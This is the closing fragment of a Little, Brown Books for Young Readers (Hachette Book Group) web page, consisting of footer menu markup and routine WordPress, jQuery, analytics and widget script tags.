<li id="menu-item-478328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478328"><a href="https://www.hachettebookgroup.com/press-publicity/">Press &amp; Publicity</a></li>
</ul>		</div>
	</li>
</ul>

<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-resources" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-resources">
			Resources			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-resources">
			<ul id="menu-resources" class="menu"><li id="menu-item-230735" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230735"><a target="_blank" rel="noopener" href="https://authorportal.hbgusa.com">Authors &#038; Agents</a></li>
<li id="menu-item-230733" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230733"><a target="_blank" rel="noopener" href="https://www.hachettebookgroup.com/landing-page/hbg-booksellers/">Booksellers</a></li>
<li id="menu-item-230734" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230734"><a target="_blank" rel="noopener" href="https://www.hachettebookgroup.com/landing-page/client-services/">Client Services</a></li>
<li id="menu-item-230736" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230736"><a target="_blank" rel="noopener" href="https://www.hbgresources.com/">Librarians &#038; Educators</a></li>
<li id="menu-item-665775" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-665775"><a href="https://www.hachettebookgroup.com/landing-page/ordersupport">eCommerce Order Support</a></li>
<li id="menu-item-913357" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-913357"><a href="https://www.hachetteacademic.com/">Hachette Academic</a></li>
<li id="menu-item-512066" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-512066"><a href="https://www.lbyr.com/about/careers/">Careers</a></li>
<li id="menu-item-478333" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-478333"><a href="https://www.hachettebookgroup.com/landing-page/contact-us-2">Contact HBG</a></li>
<li id="menu-item-478352" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478352"><a href="https://www.hachettebookgroup.com/about/faqs/">FAQ</a></li>
</ul>		</div>
	</li>
</ul>

<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-terms-and-policies" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-terms-and-policies">
			Terms and Policies			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-terms-and-policies">
			<ul id="menu-terms-and-policies" class="menu"><li id="menu-item-230741" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230741"><a href="https://www.hachettebookgroup.com/terms-and-policies/terms-of-use/">Terms of Use</a></li>
<li id="menu-item-230740" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-230740"><a href="https://www.hachettebookgroup.com/terms-and-policies/privacy-policy/">Privacy Policy</a></li>
<li id="menu-item-927110" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-927110"><a target="_blank" rel="noopener" href="https://hbgusa.zendesk.com/hc/en-us/articles/360047685472-HBG-CCPA-Privacy-Rights-Tool">Do Not Sell My Personal Information</a></li>
<li id="menu-item-362560" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-362560"><a href="https://www.hachettebookgroup.com/terms-and-policies/report-piracy/">Report Piracy</a></li>
<li id="menu-item-230738" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230738"><a href="https://www.lbyr.com/terms-and-policies/cpsia/">CPSIA</a></li>
</ul>		</div>
	</li>
</ul>
	</nav>
	<div class="site-footer__copyright">
		© 2022 Hachette Book Group		<br>
		Portions of data on HachetteBookGroup.com are supplied by Books In Print &reg;. Copyright 2022 ProQuest LLC. All rights reserved. All rights in images of books or other publications are reserved by the original copyright owners.	</div>
</footer>
			</div><!-- #content -->
		</div><!-- #page -->
		<script type='text/javascript' src='https://www.lbyr.com/wp-content/mu-plugins/jetpack-11.2/_inc/build/photon/photon.min.js?ver=20191001' id='jetpack-photon-js'></script>
<script type='text/javascript' src='https://www.lbyr.com/wp-content/plugins/hachette-plugin/build/campaignViewFrontEnd.bundle.min.js?ver=e5c529a22dcbaed12776' id='hachette-plugin-campaign-view-frontend-js'></script>
<script type='text/javascript' src='https://www.lbyr.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1' id='jquery-ui-core-js'></script>
<script type='text/javascript' src='https://www.lbyr.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.13.1' id='jquery-ui-menu-js'></script>
<script type='text/javascript' src='https://www.lbyr.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9' id='regenerator-runtime-js'></script>
<script type='text/javascript' src='https://www.lbyr.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0' id='wp-polyfill-js'></script>
<script type='text/javascript' src='https://www.lbyr.com/wp-includes/js/dist/dom-ready.min.js?ver=d996b53411d1533a84951212ab6ac4ff' id='wp-dom-ready-js'></script>
<script type='text/javascript' src='https://www.lbyr.com/wp-includes/js/dist/hooks.min.js?ver=c6d64f2cb8f5c6bb49caca37f8828ce3' id='wp-hooks-js'></script>
<script type='text/javascript' src='https://www.lbyr.com/wp-includes/js/dist/i18n.min.js?ver=ebee46757c6a411e38fd079a7ac71d94' id='wp-i18n-js'></script>
<script type='text/javascript' id='wp-i18n-js-after'>
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
</script>
<script type='text/javascript' src='https://www.lbyr.com/wp-includes/js/dist/a11y.min.js?ver=a38319d7ba46c6e60f7f9d4c371222c5' id='wp-a11y-js'></script>
<script type='text/javascript' id='jquery-ui-autocomplete-js-extra'>
/* <![CDATA[ */
var uiAutocompleteL10n = {"noResults":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","manyResults":"%d results found. Use up and down arrow keys to navigate.","itemSelected":"Item selected."};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.lbyr.com/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.13.1' id='jquery-ui-autocomplete-js'></script>
<script type='text/javascript' src='https://www.lbyr.com/wp-content/themes/hachette/static/js/common.bundle.min.js?ver=945a749d6bbde67556d7' id='hachette-common-js-js'></script>
<script type='text/javascript' src='https://www.lbyr.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2' id='hoverIntent-js'></script>
<script type='text/javascript' id='hachette-site-js-js-extra'>
/* <![CDATA[ */
var newsletter = {"ajax_url":"https:\/\/www.lbyr.com\/wp-admin\/admin-ajax.php","nonce":"893ab1b1a7","duplicate":"Success! You're signed up.","success":"Success! You're signed up.","invalid":"Hm, try another email?","error":"We're sorry, there was an error."};
var mailchimpPopup = {"ajax_url":"https:\/\/www.lbyr.com\/wp-admin\/admin-ajax.php","nonce":"767b3c237e","success":"Your preferences have been successfully saved.","error":"We're sorry, there was an error."};
var whatsInside = {"ajaxUrl":"\/wp-admin\/admin-ajax.php?action=zola_preview&zola-auth=e33bdc9e56"};
var lazyTitles = {"ajaxUrl":"\/wp-admin\/admin-ajax.php?action=lazy_title&load-title-auth=2822078acf"};
var icons = {"contributor":"https:\/\/www.lbyr.com\/wp-content\/themes\/hachette\/static\/images\/icons\/contributor.png","hbg-title":"https:\/\/www.lbyr.com\/wp-content\/themes\/hachette\/static\/images\/icons\/hbg-title.png"};
var geoCountryCode = "US";
var euroUser = "false";
var gdprForAll = "false";
var analytics = {"environAuth":"EVafa-1EU0ArWEPW1vxdeQ","environPreview":"env-24","dataLayer":"dataLayer","containerKey":"GTM-5LRFFXK"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.lbyr.com/wp-content/themes/hachette/static/js/hachette-site.bundle.min.js?ver=945a749d6bbde67556d7' id='hachette-site-js-js'></script>
<script type='text/javascript' id='hbg-all-domains-js-js-extra'>
/* <![CDATA[ */
var checkExam = {"ajaxUrl":"https:\/\/www.lbyr.com\/wp-admin\/admin-ajax.php","nonce":"3241ecb81b","isbns":["Best Dressed Bookshelf of 2022"],"button":".zb-btn","link":"exam-copy-link","zola_url":"https:\/\/examcopyrequestform.poweredbyzola.com\/?isbn="};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.lbyr.com/wp-content/themes/hachette-book-group/client/build/js/lens-hbg-all-domains.bundle.js?ver=9e944d6343f0b2c9a5cd' id='hbg-all-domains-js-js'></script>
<script type='text/javascript' id='vue_cart-js-extra'>
/* <![CDATA[ */
var source = {"env":"production","cartMessage":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.lbyr.com/wp-content/themes/hachette-book-group/client/build/images/static/js/cart.js?ver=0.1' id='vue_cart-js'></script>
<script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=1.0' id='hbg-twitter-widget-js'></script>
<script type='text/javascript' src='https://www.lbyr.com/wp-content/themes/hachette-book-group/client/build/js/lens-little-brown-books-for-young-readers.bundle.js?ver=9e944d6343f0b2c9a5cd' id='hachette-lens-js-js'></script>
<script src='https://stats.wp.com/e-202236.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:11.2',blog:'155679224',post:'1261559',tz:'-4',srv:'www.lbyr.com',hp:'vip'} ]);
	_stq.push([ 'clickTrackerInit', '155679224', '1261559' ]);
</script>
	</body>
</html>

